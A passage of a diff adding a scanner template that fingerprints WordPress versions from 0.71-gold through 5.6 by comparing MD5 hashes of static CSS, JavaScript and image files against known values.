"(\"b386228e88380ff75bcf293d432db6a4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"94d8926ae846f335cf811cbf61635298\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1be4557714895c25adba8260adcc05ab\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"55e763de4264920be68a1f998fccc720\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"0f784f57881b720d887823b519fa143f\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"fa1ab1ee7f929d54403190cb29e496fe\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"b84abcd93646dedd34ab5c0fe7ffd284\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"6a350c561385084ca1b185cd812e7f43\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"d4252f4e714f52e5670c05fbc02b5ced\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview.min.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"69bfc88e3f3d46f116da818588e1c958\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"f97c81542e5a01d1d1fafc83d3e919e4\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"76bf4def75558cdf6dcfc19e594b77a6\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"531c56155495680f35003643b5cfaa48\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8774579bd6b94878424d338bb07b743d\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"82273ee41dee175c7defaaadad83da06\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"7a6724d220d95c58e9cad4439440e987\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview-rtl.min.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"cccb91a79bd1a1b14bdad769d3b04ff2\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"c48fdf5861c04e2024cfdd46da5955ee\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"f2c05a610b3d909c6aa8d4babd48537b\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"26b12a98fb6b6e4b9791e35fa9df232b\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"9d5d67784b768a01eb2b9dd0ad92df39\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"a5a052c8869b9f302405b069b1aa0613\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"f77ee2e90b397bdc85b94fef4ec3c339\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"0ab30f10403b04fae67be3820704c05f\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"ff2b06049dc65d95cd7f18988e6e7dd1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"98c2c3a588daf7cde40f226ac67f2ddb\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"27b10ba4bbd6ab877d3aefa45d9bb779\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5fdb191ad80e4816383046e16098b1f1\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"90dc80956cdac4efdc00e1fa2f1fd826\" == md5(body))" + - type: dsl + name: 5.3 - 5.6 + dsl: + - "(\"4c4992759e2e9171987ee83c2b4ff8f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"69119370ea789693d6c810f34364c99c\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"f70177af61c65044aaa0a18594338f3c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"ba1ad4bc43e2aa43661307a5599b48c5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ae6578b0e82b02df40c157015c7d3683\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"40c7819542c846fc69a480e2bb87f722\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"7399d7a8a9a716303de9628083a61070\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"d47998057f5f31758add87f462076fe2\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a7a67d1de1a0330fc7769d384a6564cc\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ecfba7b663d82c1fbecfbcc86db4a649\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.2 + dsl: + - "(\"0e31542957a5ced3fb021a641359a902\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"d2923af1854be05bcf49775c89aa6798\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"70b1fc34e77c76bb92be0c02b229b467\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"ae983b9a7a8d0ad43cad5ef5ad85c1ab\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0076bd51c8efaca78a6455c512e8be05\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"8808a137a054725f8fc730e4bbb58b89\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"38740af5358c42ca3770804aca9b1e2d\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"ed15397c76c49fb9518bdb1b912a55ef\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b778c332bab095f15db744c1795a430e\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"5f222b295e30dd62dfe160985b95f495\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"fc97c80e6a890c6b30837a2b7ccea115\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"a17103ce4c70991f0751a1df272eac49\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"2a32942db87ad5f97fd3cfe5b3317609\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"591f9bbbaefec332c4b00d6d7d25a1c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/wp-small.png" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"ac8d6980faf95aa199492d5f3abdfa82\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/wordpress.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"9d2220fca1ac66355fb7ca7916d5a2e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/url.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"44eea3b2c6b0e045292ddaa8b828b3a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/bgbookmarklet1.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"3a09dfc3d0fe15f0690bfccb8e85830e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/bgbookmarklet.png" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"f0e41f1bed9a4c21d1dc545e5d3c158a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/bgbookmarklet3.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"686f31ec275bfa7652a4f290e9a77307\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/email.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e53e211ef830dd087508e4967613d8cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/xml.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e67c90a18c89f8d05125c045b2978dcf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/wpminilogo.png" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"2f58b9a016e6da1012819decfc6dd331\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_question.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_neutral.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_sad.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_biggrin.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_surprised.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_wink.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_cool.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_confused.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_redface.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_cry.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_smile.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_evil.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_mrgreen.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_idea.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_razz.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_lol.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_rolleyes.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_exclaim.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_mad.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_twisted.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_arrow.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/smilies/icon_eek.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-img/blank.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"6d22e4f2d2057c6e8d6fab098e76e80f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-2.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"de5cf34823da2cfed273b9c8cf52248a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/star.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"888920359f8931eb72582d0c352722ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-3.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"a5b70a894f90cf8574284b7296f7661c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-9.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"4eda31d251821e5d6e5ed9cad411434f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-0.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"745de19d2c08e95dfa07113d16d77ace\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-6.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"7320c171d53bc359b0cd7ae1b53774d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-7.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"a8cbf1fe3a498f4a20abd6768a46de7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-8.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"c5cb7ee14792e1658bc0663014d37f65\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-4.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"aa064cadd0f43c0352607dad68bc5af2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-1.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"bdc9ea72a16082ff4d0ac730f090e0d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-links/links-images/rating-5.gif" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"42698681e4d8734c2932c2415b94b713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-include/xmlrpcs.inc" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"0d59ddac24244f58002965f254602d32\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/b2-include/xmlrpc.inc" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"14524c5d7f9f72394e04512d9941bc50\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/layout2b.css" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"baec6b6ccbf71d8dced9f1bf67c751e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/readme.txt" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"d6a0bc72fe7314bf9e5a823476464f35\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/b2quicktags.js" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"e7df5ea2abd8e8ff1cdc33c890f8b158\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/b2menutop.txt" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"75c44385f76be11e237f16e6197cf5f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/b2.css" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"3c14414953b50843020e9ffdab7d8f9b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/example.htaccess" + matchers: + - type: dsl + name: 0.71-gold + dsl: + - "(\"194e5ef5e9fcfffb5ad172c3c6338ce4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/print.css" + matchers: + - type: dsl + name: 0.71-gold - 1.2.2 + dsl: + - "(\"31303216dd399348d4fe45e4f775e761\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"fabceb537401cb07c705e7a7203f3cf6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/widgets-rtl.css" + matchers: + - type: dsl + name: 2.2.3 + dsl: + - "(\"616cfd535e185eab0a2e2035d2367d70\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.2 + dsl: + - "(\"6870131d25b60c372f372e0eb1f46a4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/install-rtl.css" + matchers: + - type: dsl + name: 2.2.3 + dsl: + - "(\"77b94469c0536617ccf3f128e82629e7\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.2 + dsl: + - "(\"8cbe81cffd55d03cbeccf0fe7afea257\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/widgets.css" + matchers: + - type: dsl + name: 2.2.1 - 2.2.3 + dsl: + - "(\"d751fab844dac51f11dfcde4bcd951fe\" == md5(body))" + - type: dsl + name: 2.2 + dsl: + - "(\"2ab4e0bc7e978c7eecaf6d54867370a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax.js" + matchers: + - type: dsl + name: 2.2.1 - 2.5.1 + dsl: + - "(\"c65fa296a21bab7aaac66f145ac45155\" == md5(body))" + - type: dsl + name: 2.2 + dsl: + - "(\"c5dbce0c3232c477033e0ce486c62755\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-ie-rtl.css" + matchers: + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"0270238fcfc6b6195b11227c1671b8e0\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"8a06d53fca440005e815e5654b152700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/forms.js" + matchers: + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"06f1e99c547915248f28eb8e0a59a316\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"5248ccc0d3a9bcdd0dc8b2faf129db2d\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"cebab0a1616272ef63c4e98ae005a3f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/wp-admin.dev.css" + matchers: + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"59f4b6b1fe9d9d775f531772284fedda\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"59bd3e53cbab943706702e18622f517d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-gears.js" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0f72be7cae8c998be51a21216abca01d\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"596473e965c68ad64c8c20b5c56e0da3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1335ebf3c647fb07e0b9e427e83ed435\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"53683d6a5dd7d32ebb703fce7b894620\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"e08d34a883c155084296c35872e0b382\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor.css" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"b2ee1f0928a71f8621e17f702da4bf15\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b3772e896c38a69013ebafca1da7a49a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"19dac48c3c808feb3a3f5e6eb4af11da\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"2c86c9314921ac6acd69e480f092eb65\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"1d469fa64b12915edd13d68148453c72\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"049a5595657f110b9cbbb31cad73b094\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1a7408da79a9bae4ef8e741f295f9f21\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"4d510f0a9aa612e1e196e5620040a426\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/theme-editor-rtl.css" + matchers: + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"afad874ed34bfb50e3fb57cc20b93d56\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.9.2 + dsl: + - "(\"67937f3a3e8e4b9eeaa5fe15c1cce63b\" == md5(body))" + - type: dsl + name: 2.7 - 2.8 + dsl: + - "(\"2e4be8eba21d8e05e18d9fc03c9a1f6e\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"1cd1b9f3b3477cc40cb2a4b3af29cc0c\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"a3cde5875a5257cc8c910d1a2838e801\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"0ef754d669368b5736ddcadb366d4c05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar.dev.css" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"541419d7c0122d14d9fd1da3142a25c0\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5dc8ab63a6a5936550b79bc5287eb229\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8551c02b4c8c6d91355ff61745f6c164\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"5cee5b5a5cb2bfdc471296741568da9b\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"afebbd5ba8b14fdd0397021244066daa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor.dev.css" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"8f375efc2f2a3f703d6ba284f99830d4\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"4ff306aa0f0331e56473dbeef3fbcd51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"75bd0d965758c849bd27173d7aec1923\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"cedf550582b93e7cf4779203a8a99f2d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"7958066469b0a567962a6355d9c5f817\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"db66fc020cd91632a8689214cf532a23\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"6e708a6fb002e7e2b46f0b6ca081ab3d\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"49f263599016025d39f84c17bd6287c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-lists.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"bb69091155683715d2902019693ceeac\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"91723a5f56f555a02bcf3e169694f77a\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c48d5b52db182adec677f77dd6771b53\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"5afcff15a6ae5783bbc49efb8e556eb9\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"3307a4b7fce5e39e3c13f0e3478cbb5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview.dev.js" + matchers: + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"16e10c6310bd62bb63876f0094592ef4\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"7ea457381aefb6d20836d3af804af618\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-profile.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9a55eb19b2ba406d0c446494f5082362\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"cea2eb0573610ab89618ec3e1104fe87\" == md5(body))" + - type: dsl + name: 3.1.4 + dsl: + - "(\"b2385b31e10f0e05868dc9963f6b5492\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.3 + dsl: + - "(\"aba1c36c2aaa7856f19eb45068260a46\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"284081f3b85fbb4cbaf29ff392924c6c\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"b1ba00820be627f9a5bb9ad51c226c6e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link.dev.js" + matchers: + - type: dsl + name: 3.4.2 + dsl: + - "(\"573fdbc34e8d60090cd5f5290a677078\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.1 + dsl: + - "(\"e1cab0e9026cb713c471a03159aa8472\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"2886215c2ab637527435c672daa242ab\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"ecf1bfdbf145bdab5a0d61ea4039ef55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/postbox.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"6feb51918fed2bb0c6b8b470deaa4b1f\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d2894d1539a2a643cef3407784270551\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"f2b64b5e910458f653b82ad02ca3f519\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"0fd0915b4e9938ea328460378af5b29d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"ba550af784b2072d39ca2c6eea2eecbb\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"866680547d1d53c6782291784e89f873\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"19bf9fa83624020a518d7bcc8b60c1bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/edit-comments.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"84faa202d218b1c0df4ada14f9db0121\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"6325c905c75a48653c4d3d0c1dcae7bf\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"5a4f669ae76504682ca496fbde606c88\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"13032daf9f83b9de0aeb220bc4fc1ab2\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"a8ec0a555e4723d13bd14e2f7eda7b44\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"60dec0058dce41d4dd1a97068403709b\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"6b85ab29401b236b7248d2a1aba7f209\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"9b02ddd09ea4d920bcb98e6736fa26ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dashboard.dev.js" + matchers: + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a86e3c459bfdce83b8925f9dc29a7905\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"371dc51fe87c122bbcb9565c9dd0c145\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6c9a8d6d69c23e49480e9e164b7cdaa5\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - 